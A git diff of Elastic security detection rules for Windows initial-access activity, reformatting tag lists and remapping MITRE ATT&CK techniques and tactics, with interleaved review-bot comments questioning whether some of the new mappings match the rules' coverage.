+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: Sysmon",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: SentinelOne",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -93,18 +105,41 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1566"
+name = "Phishing"
+reference = "https://attack.mitre.org/techniques/T1566/"
+[[rule.threat.technique.subtechnique]]
+id = "T1566.001"
+name = "Spearphishing Attachment"
+reference = "https://attack.mitre.org/techniques/T1566/001/"
+
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1059.001"
 name = "PowerShell"
 reference = "https://attack.mitre.org/techniques/T1059/001/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.005"
+name = "Visual Basic"
+reference = "https://attack.mitre.org/techniques/T1059/005/"
+
+
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
diff --git a/rules/windows/initial_access_scripts_process_started_via_wmi.toml b/rules/windows/initial_access_scripts_process_started_via_wmi.toml
index b11dbd1bfda..6846a4ea7e0 100644
--- a/rules/windows/initial_access_scripts_process_started_via_wmi.toml
+++ b/rules/windows/initial_access_scripts_process_started_via_wmi.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/27"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic"]
@@ -58,7 +58,17 @@ Windows Management Instrumentation (WMI) is a powerful Windows feature that allo
 risk_score = 47
 rule_id = "b64b183e-1a76-422d-9179-7b389513e74d"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Initial Access",
+ "Tactic: Execution",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: Sysmon",
+ "Resources: Investigation Guide",
+]
 type = "eql"
 query = '''
@@ -96,7 +106,23 @@ sequence by host.id with maxspan = 5s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1566"
+name = "Phishing"
+reference = "https://attack.mitre.org/techniques/T1566/"
+[[rule.threat.technique.subtechnique]]
+id = "T1566.001"
+name = "Spearphishing Attachment"
+reference = "https://attack.mitre.org/techniques/T1566/001/"
+
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1047"
 name = "Windows Management Instrumentation"
@@ -106,8 +132,15 @@ reference = "https://attack.mitre.org/techniques/T1047/"
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.005"
+name = "Visual Basic"
+reference = "https://attack.mitre.org/techniques/T1059/005/"
+
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
diff --git a/rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml b/rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml
index 2171b83fa7e..402f26c77f3 100644
--- a/rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml
+++ b/rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/02/13"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/02/13"
 [rule]
 author = ["Elastic"]
@@ -49,7 +49,15 @@ references = [
 risk_score = 47
 rule_id = "c3d4e5f6-a7b8-6c9d-0e1f-2a3b4c5d6e7f"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Initial Access",
+ "Tactic: Execution",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -76,49 +84,34 @@ process where host.os.type == "windows" and event.action == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1218"
-name = "System Binary Proxy Execution"
-reference = "https://attack.mitre.org/techniques/T1218/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1218.005"
-name = "Mshta"
-reference = "https://attack.mitre.org/techniques/T1218/005/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1218.007"
-name = "Msiexec"
-reference = "https://attack.mitre.org/techniques/T1218/007/"
-
+id = "T1195"
+name = "Supply Chain Compromise"
+reference = "https://attack.mitre.org/techniques/T1195/"
 [[rule.threat.technique.subtechnique]]
-id = "T1218.011"
-name = "Rundll32"
-reference = "https://attack.mitre.org/techniques/T1218/011/"
+id = "T1195.002"
+name = "Compromise Software Supply Chain"
+reference = "https://attack.mitre.org/techniques/T1195/002/"
 [rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1059.001"
-name = "PowerShell"
-reference = "https://attack.mitre.org/techniques/T1059/001/"
-
+[[rule.threat.technique]]
+id = "T1204"
+name = "User Execution"
+reference = "https://attack.mitre.org/techniques/T1204/"
 [[rule.threat.technique.subtechnique]]
-id = "T1059.003"
-name = "Windows Command Shell"
-reference = "https://attack.mitre.org/techniques/T1059/003/"
+id = "T1204.002"
+name = "Malicious File"
+reference = "https://attack.mitre.org/techniques/T1204/002/"
 [rule.threat.tactic]
 id = "TA0002"
diff --git a/rules/windows/initial_access_suspicious_ms_exchange_files.toml b/rules/windows/initial_access_suspicious_ms_exchange_files.toml
index 9ac8018570c..519fd905a68 100644
--- a/rules/windows/initial_access_suspicious_ms_exchange_files.toml
+++ b/rules/windows/initial_access_suspicious_ms_exchange_files.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/03/04"
 integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic", "Austin Songer"]
@@ -48,7 +48,20 @@ references = [
 risk_score = 47
 rule_id = "6cd1779c-560f-4b68-a8f1-11009b27fe63"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: Elastic Endgame", "Use Case: Vulnerability", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Initial Access",
+ "Tactic: Lateral Movement",
+ "Data Source: Elastic Endgame",
+ "Use Case: Vulnerability",
+ "Data Source: Elastic Defend",
+ "Data Source: Sysmon",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: SentinelOne",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -72,31 +85,26 @@ file where host.os.type == "windows" and event.type == "creation" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1190"
 name = "Exploit Public-Facing Application"
 reference = "https://attack.mitre.org/techniques/T1190/"
+
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1505"
-name = "Server Software Component"
-reference = "https://attack.mitre.org/techniques/T1505/"
+id = "T1210"
+name = "Exploitation of Remote Services"
+reference = "https://attack.mitre.org/techniques/T1210/"
-[[rule.threat.technique.subtechnique]]
-id = "T1505.003"
-name = "Web Shell"
-reference = "https://attack.mitre.org/techniques/T1505/003/"
 [rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
+id = "TA0008"
+name = "Lateral Movement"
+reference = "https://attack.mitre.org/tactics/TA0008/"
+
diff --git a/rules/windows/initial_access_suspicious_ms_exchange_process.toml b/rules/windows/initial_access_suspicious_ms_exchange_process.toml
index a19fcd489c2..00f178cfbd2 100644
--- a/rules/windows/initial_access_suspicious_ms_exchange_process.toml
+++ b/rules/windows/initial_access_suspicious_ms_exchange_process.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/03/04"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/08/28"
 [rule]
 author = ["Elastic", "Austin Songer"]
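Review bot: Swapping the second `[[rule.threat]]` entry from T1505.003 Web Shell / TA0003 Persistence to T1210 Exploitation of Remote Services / TA0008 Lateral Movement changes what this rule claims to cover, and the query (`file where ... event.type == "creation"`) lies outside the hunk. T1210 describes exploiting services reachable from inside the network in order to move laterally, which is a different behaviour from files being written on an Exchange server after a public-facing exploit, so it is worth confirming the new mapping against the rule's description rather than treating it as a relabel; if the intent was only to avoid a second Persistence tactic, keeping T1190 alone would be the conservative choice. The same T1210 / TA0008 entry is added to the Exchange process rule in the next file section and should be reviewed together with this one.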
@@ -73,7 +73,22 @@ references = [ risk_score = 47 rule_id = "483c4daf-b0c6-49e0-adf3-0bfa93231d6b" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: Elastic Endgame", "Use Case: Vulnerability", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -107,13 +122,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml b/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml index fbd7ead64d2..28e435a3737 100644 
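Review bot: The added `[[rule.threat]]` block maps this process-start rule to T1210 / TA0008 Lateral Movement next to the existing T1190 / TA0001 entry, but nothing visible in the hunk distinguishes an exploited internal service from the public-facing-application case that T1190 already covers. If the query only keys on suspicious children of Exchange processes, T1190 alone describes it; T1210 is justified only if the rule is meant to fire when Exchange is reached from inside the network. The `Tactic: Lateral Movement` tag added in the preceding tags hunk stands or falls with this block.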
--- a/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml +++ b/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/08" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/12" [rule] author = ["Elastic"] @@ -66,7 +66,19 @@ references = [ risk_score = 73 rule_id = "f81ee52c-297e-46d9-9205-07e66931df26" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -82,12 +94,22 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" 
@@ -98,38 +120,10 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" - -[[rule.threat.technique.subtechnique]] -id = "T1505.003" -name = "Web Shell" -reference = "https://attack.mitre.org/techniques/T1505/003/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/initial_access_suspicious_ms_office_child_process.toml b/rules/windows/initial_access_suspicious_ms_office_child_process.toml index f44626289f7..74d8fad8028 100644 --- a/rules/windows/initial_access_suspicious_ms_office_child_process.toml +++ b/rules/windows/initial_access_suspicious_ms_office_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
@@ -77,7 +77,22 @@ references = ["https://www.elastic.co/blog/vulnerability-summary-follina"] risk_score = 47 rule_id = "a624863f-a70d-417f-a7d2-7a404638d47f" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" 
@@ -108,25 +123,27 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" 
@@ -137,27 +154,22 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" -[[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" -[[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" - -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml b/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml index c00264926f5..c0828b44e66 100644 --- a/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml +++ b/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
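Review bot: The Execution block loses T1203 (Exploitation for Client Execution), T1204.002 (Malicious File) and T1059.005 (Visual Basic) with no replacement, and the T1566.001 entry added in the previous hunk only covers the delivery step; for a rule whose references, per the earlier hunk header, point at the Follina write-up, T1203 and T1204.002 are the techniques that describe what the Office child process represents. The ms_outlook_child_process threat hunk `@@ -95,36 +110,53 @@` drops T1204.002 the same way, and the url_cve_2025_33053 hunk `@@ -72,31 +84,37 @@` drops T1203. Keeping the phishing mapping and the client-execution mapping side by side preserves the coverage the old side had.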
@@ -75,7 +75,22 @@ This rule looks for suspicious processes spawned by MS Outlook, which can be the risk_score = 21 rule_id = "32f4675e-6c49-4ace-80f9-97c9259dca2e" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Initial Access", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike", "Data Source: Sysmon"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Windows Security Event Logs", + "Data Source: Crowdstrike", + "Data Source: Sysmon", +] timestamp_override = "event.ingested" type = "eql" 
@@ -95,36 +110,53 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" [[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + 
diff --git a/rules/windows/initial_access_suspicious_windows_server_update_svc.toml b/rules/windows/initial_access_suspicious_windows_server_update_svc.toml index d60b1c1c4fa..c1bfe3cbe84 100644 --- a/rules/windows/initial_access_suspicious_windows_server_update_svc.toml +++ b/rules/windows/initial_access_suspicious_windows_server_update_svc.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/24" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/24" [rule] author = ["Elastic"] @@ -58,7 +58,19 @@ references = [ risk_score = 73 rule_id = "1ac027c2-8c60-4715-af73-927b9c219e20" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -74,30 +86,22 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" -[[rule.threat.technique.subtechnique]] -id = "T1218.011" -name = "Rundll32" -reference = "https://attack.mitre.org/techniques/T1218/011/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -108,7 +112,10 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/initial_access_url_cve_2025_33053.toml b/rules/windows/initial_access_url_cve_2025_33053.toml index 2f44d1c7787..17c356f8d2c 100644 --- a/rules/windows/initial_access_url_cve_2025_33053.toml +++ b/rules/windows/initial_access_url_cve_2025_33053.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/11" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/06/11" [rule] author = ["Elastic"] 
@@ -52,7 +52,19 @@ references = [ risk_score = 73 rule_id = "5e23495f-09e2-4484-8235-bdb150d698c9" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -72,31 +84,37 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" [[rule.threat.technique.subtechnique]] -id = "T1574.008" -name = "Path Interception by Search Order Hijacking" -reference = "https://attack.mitre.org/techniques/T1574/008/" +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + + + [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml b/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml index f5e2aeffe12..7a7e8c67522 100644 --- a/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml +++ b/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/10/29" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -60,7 +60,20 @@ Windows Explorer, a core component of the Windows OS, manages file and folder na risk_score = 47 rule_id = "9a5b4e31-6cde-4295-9ff7-6be1b8567e1b" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
